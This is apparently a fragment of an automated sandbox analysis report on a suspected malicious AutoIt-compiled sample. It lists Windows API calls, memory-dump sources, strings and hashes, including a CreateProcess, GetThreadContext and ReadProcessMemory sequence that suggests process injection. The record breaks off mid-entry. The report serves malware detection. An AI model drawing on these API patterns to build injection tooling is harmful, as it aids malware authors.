                                                • _memset.LIBCMT ref: 00AA522F
                                                • _wcscpy.LIBCMT ref: 00AA5283
                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AA5293
                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B13CB0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                • String ID: Line:
                                                • API String ID: 1053898822-1585850449
                                                • Opcode ID: 36a880115870572821aa094455040293b9e1004781a328700ff15eae35c80d4d
                                                • Instruction ID: 70030c6ad15d21ed3ff8d3f3b1977b80b09a623e0b38c7dc71207e11e51e82ad
                                                • Opcode Fuzzy Hash: 36a880115870572821aa094455040293b9e1004781a328700ff15eae35c80d4d
                                                • Instruction Fuzzy Hash: EB31BE71408340AED721EB64DD42FEE77E8AB46310F044A1EF585931D1EBB4A6898B9A
                                                APIs
                                                  • Part of subcall function 00AA41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00AA39FE,?,00000001), ref: 00AA41DB
                                                • _free.LIBCMT ref: 00B136B7
                                                • _free.LIBCMT ref: 00B136FE
                                                  • Part of subcall function 00AAC833: __wsplitpath.LIBCMT ref: 00AAC93E
                                                  • Part of subcall function 00AAC833: _wcscpy.LIBCMT ref: 00AAC953
                                                  • Part of subcall function 00AAC833: _wcscat.LIBCMT ref: 00AAC968
                                                  • Part of subcall function 00AAC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00AAC978
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                • API String ID: 805182592-1757145024
                                                • Opcode ID: 4462330faf0a1891951a0d5512d5c2d551ed505b72714068078a8d0b00b70e3d
                                                • Instruction ID: 6a9841e5134b07d7a4d9e63da80c3d50b8e4809348f0edf4da83c53a9cb1a138
                                                • Opcode Fuzzy Hash: 4462330faf0a1891951a0d5512d5c2d551ed505b72714068078a8d0b00b70e3d
                                                • Instruction Fuzzy Hash: 9B917C71910219AFCF04EFA4CD919EEB7F4FF19710F50446AF816AB291EB74AA44CB60
                                                APIs
                                                  • Part of subcall function 00AA5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B61148,?,00AA61FF,?,00000000,00000001,00000000), ref: 00AA5392
                                                  • Part of subcall function 00AA49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00AA4A1D
                                                • _wcscat.LIBCMT ref: 00B12D80
                                                • _wcscat.LIBCMT ref: 00B12DB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _wcscat$FileModuleNameOpen
                                                • String ID: \$\Include\
                                                • API String ID: 3592542968-2640467822
                                                • Opcode ID: dac845be2910aa53b92162a0882346af9f8a40775d71dec6fa3f2fc30e3f7ffd
                                                • Instruction ID: 71734fce290d9b31452194c2432b89e48a0fc5f12f1a5a1e6f68add0a6c698c8
                                                • Opcode Fuzzy Hash: dac845be2910aa53b92162a0882346af9f8a40775d71dec6fa3f2fc30e3f7ffd
                                                • Instruction Fuzzy Hash: 095194724087409FD704EF65EA8189AB7F4FF5B300B80056EF644A32E0DFB49648CB52
                                                APIs
                                                • __getstream.LIBCMT ref: 00AC34FE
                                                  • Part of subcall function 00AC7C0E: __getptd_noexit.LIBCMT ref: 00AC7C0E
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00AC3539
                                                • __wopenfile.LIBCMT ref: 00AC3549
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                • String ID: <G
                                                • API String ID: 1820251861-2138716496
                                                • Opcode ID: d24c8249358a14f87e0630fcb1b4f9fedc3c6c42834e9c971332d290b32a6908
                                                • Instruction ID: b4d178ab2121c5c0ba9ea8492431274b5de85263b77da7f8a30cd6044d0f3719
                                                • Opcode Fuzzy Hash: d24c8249358a14f87e0630fcb1b4f9fedc3c6c42834e9c971332d290b32a6908
                                                • Instruction Fuzzy Hash: FC11E772A002069FDF15BF709E42F6E36B4AF05350B17C56DE815DB281EB34CA019BA1
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00ABD28B,SwapMouseButtons,00000004,?), ref: 00ABD2BC
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00ABD28B,SwapMouseButtons,00000004,?,?,?,?,00ABC865), ref: 00ABD2DD
                                                • RegCloseKey.KERNELBASE(00000000,?,?,00ABD28B,SwapMouseButtons,00000004,?,?,?,?,00ABC865), ref: 00ABD2FF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                • Opcode ID: 952198942c9a9a27b5cde07ac7e995a2b5d433bf5a23ba81c292b262271f6e04
                                                • Instruction ID: 1dc6a16db9907221126705bc5d9bfff2457170619be4256eb5dca4f401f1ea5c
                                                • Opcode Fuzzy Hash: 952198942c9a9a27b5cde07ac7e995a2b5d433bf5a23ba81c292b262271f6e04
                                                • Instruction Fuzzy Hash: CD112775611208BFDB218FA4CC84EEF7BFCEF44744F104469A805DB221E731AE41AB64
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01338C43
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01338CD9
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01338CFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144958630.0000000001337000.00000040.00000020.00020000.00000000.sdmp, Offset: 01337000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1337000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                                • Instruction ID: 024c9b4c46e5c6f102e8a49376ef96e9ae14f94dcba7f322dd9053f24ccddcff
                                                • Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                                • Instruction Fuzzy Hash: 3C620F30A14258DBEB24CFA4C850BDEB776EF58304F1091A9E20DEB390E7759E85CB59
                                                APIs
                                                  • Part of subcall function 00AA4517: _fseek.LIBCMT ref: 00AA452F
                                                  • Part of subcall function 00AEC56D: _wcscmp.LIBCMT ref: 00AEC65D
                                                  • Part of subcall function 00AEC56D: _wcscmp.LIBCMT ref: 00AEC670
                                                • _free.LIBCMT ref: 00AEC4DD
                                                • _free.LIBCMT ref: 00AEC4E4
                                                • _free.LIBCMT ref: 00AEC54F
                                                  • Part of subcall function 00AC1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00AC7A85), ref: 00AC1CB1
                                                  • Part of subcall function 00AC1C9D: GetLastError.KERNEL32(00000000,?,00AC7A85), ref: 00AC1CC3
                                                • _free.LIBCMT ref: 00AEC557
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                • String ID:
                                                • API String ID: 1552873950-0
                                                • Opcode ID: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
                                                • Instruction ID: 8766de61deb34a8574c5060e8cca1e40b78b49721e7dac0f32c09e88b714af75
                                                • Opcode Fuzzy Hash: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
                                                • Instruction Fuzzy Hash: 0D515FB1904259AFDF149F65DC81BEEBBB9EF49310F1040AEF259A3281DB715E808F58
                                                APIs
                                                • _memset.LIBCMT ref: 00ABEBB2
                                                  • Part of subcall function 00AA51AF: _memset.LIBCMT ref: 00AA522F
                                                  • Part of subcall function 00AA51AF: _wcscpy.LIBCMT ref: 00AA5283
                                                  • Part of subcall function 00AA51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AA5293
                                                • KillTimer.USER32(?,00000001,?,?), ref: 00ABEC07
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00ABEC16
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B13C88
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                • String ID:
                                                • API String ID: 1378193009-0
                                                • Opcode ID: e73f9dd426490ab68246deae2bb249089294fd69ceea909fda97ffea5b4ca388
                                                • Instruction ID: 7b94348ae906ba9df1375e09ee757f870e820114000b0694931e0d7cfd5ae6b5
                                                • Opcode Fuzzy Hash: e73f9dd426490ab68246deae2bb249089294fd69ceea909fda97ffea5b4ca388
                                                • Instruction Fuzzy Hash: 192195709047949FE732DB288855BE6BFECDB06708F04048DE69A67282D7742A858B91
                                                APIs
                                                • _memset.LIBCMT ref: 00B13725
                                                • GetOpenFileNameW.COMDLG32 ref: 00B1376F
                                                  • Part of subcall function 00AA660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA53B1,?,?,00AA61FF,?,00000000,00000001,00000000), ref: 00AA662F
                                                  • Part of subcall function 00AA40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AA40C6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                • String ID: X
                                                • API String ID: 3777226403-3081909835
                                                • Opcode ID: 9c8cf7e7b9d6ddbf989a1560badd4d68fb63c1e48ba2713f38c40d2218fa000e
                                                • Instruction ID: 5954dd28b48573aaa5d54f40225a780db7cfc0dc17e39657d1ff7c97765d71c0
                                                • Opcode Fuzzy Hash: 9c8cf7e7b9d6ddbf989a1560badd4d68fb63c1e48ba2713f38c40d2218fa000e
                                                • Instruction Fuzzy Hash: DA21A571A102989FCF41DF98C845BDEBBF99F89704F00409AF405A7281DBF45A898F65
                                                APIs
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00AEC72F
                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00AEC746
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Temp$FileNamePath
                                                • String ID: aut
                                                • API String ID: 3285503233-3010740371
                                                • Opcode ID: 9a217cf628843aac032279d7ff516ad08d84b7ee21fc26d227a6618af2cd1140
                                                • Instruction ID: 60e7c3ae1fd260af45c3e52a91ef33dde39dde12f519ed1015a9291c6637ea73
                                                • Opcode Fuzzy Hash: 9a217cf628843aac032279d7ff516ad08d84b7ee21fc26d227a6618af2cd1140
                                                • Instruction Fuzzy Hash: 92D05E7150030EABDB60AB90DC0EF8AB7AC9700704F0001A07651A60B1DAB0E69A8B55
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dccee2bdd918bf8a2ad21245ccb86400dade93ae2de828296163590274d80bb1
                                                • Instruction ID: e64d24b1fca203906c74246ce53eeef41b90721d35ee3031f4e0aeb2a06ffc4b
                                                • Opcode Fuzzy Hash: dccee2bdd918bf8a2ad21245ccb86400dade93ae2de828296163590274d80bb1
                                                • Instruction Fuzzy Hash: DAF17A716083059FCB10DF64C984B6EBBE5FF89314F14896EF9959B292DB30E905CB82
                                                APIs
                                                • _memset.LIBCMT ref: 00AA5022
                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA50CB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell__memset
                                                • String ID:
                                                • API String ID: 928536360-0
                                                • Opcode ID: b6659b472ed479a7208ca1fc37917f980977883042f37dbbbbcb6acf53ac1eb4
                                                • Instruction ID: 496380d7e286b63c25cd9fb37806dc0481ec8b249e5721e4c75e1b2b0b5ffe79
                                                • Opcode Fuzzy Hash: b6659b472ed479a7208ca1fc37917f980977883042f37dbbbbcb6acf53ac1eb4
                                                • Instruction Fuzzy Hash: A33193B1904701DFC721DF38D845697BBE4FF49308F00092EF69A83281E771A944CB96
                                                APIs
                                                • __FF_MSGBANNER.LIBCMT ref: 00AC3973
                                                  • Part of subcall function 00AC81C2: __NMSG_WRITE.LIBCMT ref: 00AC81E9
                                                  • Part of subcall function 00AC81C2: __NMSG_WRITE.LIBCMT ref: 00AC81F3
                                                • __NMSG_WRITE.LIBCMT ref: 00AC397A
                                                  • Part of subcall function 00AC821F: GetModuleFileNameW.KERNEL32(00000000,00B60312,00000104,00000000,00000001,00000000), ref: 00AC82B1
                                                  • Part of subcall function 00AC821F: ___crtMessageBoxW.LIBCMT ref: 00AC835F
                                                  • Part of subcall function 00AC1145: ___crtCorExitProcess.LIBCMT ref: 00AC114B
                                                  • Part of subcall function 00AC1145: ExitProcess.KERNEL32 ref: 00AC1154
                                                  • Part of subcall function 00AC7C0E: __getptd_noexit.LIBCMT ref: 00AC7C0E
                                                • RtlAllocateHeap.NTDLL(012F0000,00000000,00000001,00000001,00000000,?,?,00ABF507,?,0000000E), ref: 00AC399F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                • String ID:
                                                • API String ID: 1372826849-0
                                                • Opcode ID: a048c2eb33e72b8cf349f9e410586af597ab812eb7f795f56af2462aa6746ab3
                                                • Instruction ID: dc584be9c4eca46538659d44ac7fdc3aefdf124a997fd074475b33dbad60d179
                                                • Opcode Fuzzy Hash: a048c2eb33e72b8cf349f9e410586af597ab812eb7f795f56af2462aa6746ab3
                                                • Instruction Fuzzy Hash: C701B9373553029AEA253B29ED66F7E73589F82760F23412DF5059B2C2DFF49D4046A0
                                                APIs
                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00AEC385,?,?,?,?,?,00000004), ref: 00AEC6F2
                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00AEC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00AEC708
                                                • CloseHandle.KERNEL32(00000000,?,00AEC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AEC70F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleTime
                                                • String ID:
                                                • API String ID: 3397143404-0
                                                • Opcode ID: ca49a5f7e63fb0d57f1f48f7f9e3d2d8a440386411ce9a18bcb3aa703045f18d
                                                • Instruction ID: bf7b74852256617926632e59286cee2649b4a1261eeb9b5a01b33fd7be7098e6
                                                • Opcode Fuzzy Hash: ca49a5f7e63fb0d57f1f48f7f9e3d2d8a440386411ce9a18bcb3aa703045f18d
                                                • Instruction Fuzzy Hash: E6E08632140214B7D7311B55EC0AFCA7B18AB05771F104210FB147A0E09BB125228799
                                                APIs
                                                  • Part of subcall function 00AA22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00AA24F1), ref: 00AA2303
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AA25A1
                                                • CoInitialize.OLE32(00000000), ref: 00AA2618
                                                • CloseHandle.KERNEL32(00000000), ref: 00B1503A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                • String ID:
                                                • API String ID: 3815369404-0
                                                • Opcode ID: 44d0bcbf2e88bb66d745833dabb916a187a4c462905cb384fdd97a861f4b729d
                                                • Instruction ID: dd7406190a071e8aa88b3ff7251c4f0af6a58c84d131e5e101c8dfc27d80db1d
                                                • Opcode Fuzzy Hash: 44d0bcbf2e88bb66d745833dabb916a187a4c462905cb384fdd97a861f4b729d
                                                • Instruction Fuzzy Hash: 3271BEB59023818FC304EF6EA9A0595BBE4FB9A34478849AED10AD77F1CFB84404DF59
                                                APIs
                                                • IsThemeActive.UXTHEME ref: 00AA3A73
                                                  • Part of subcall function 00AC1405: __lock.LIBCMT ref: 00AC140B
                                                  • Part of subcall function 00AA3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AA3AF3
                                                  • Part of subcall function 00AA3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AA3B08
                                                  • Part of subcall function 00AA3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00AA3AA3,?), ref: 00AA3D45
                                                  • Part of subcall function 00AA3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00AA3AA3,?), ref: 00AA3D57
                                                  • Part of subcall function 00AA3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00B61148,00B61130,?,?,?,?,00AA3AA3,?), ref: 00AA3DC8
                                                  • Part of subcall function 00AA3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00AA3AA3,?), ref: 00AA3E48
                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AA3AB3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                • String ID:
                                                • API String ID: 924797094-0
                                                • Opcode ID: 624e438073e47fd376f9f3e2270fed88f011f7b0125d9576a334025ae5a9d0ae
                                                • Instruction ID: 40df161735e1cd8e4ac7ce0a7d61eb2134e3362421bfeb1a1f7f0e5272e56501
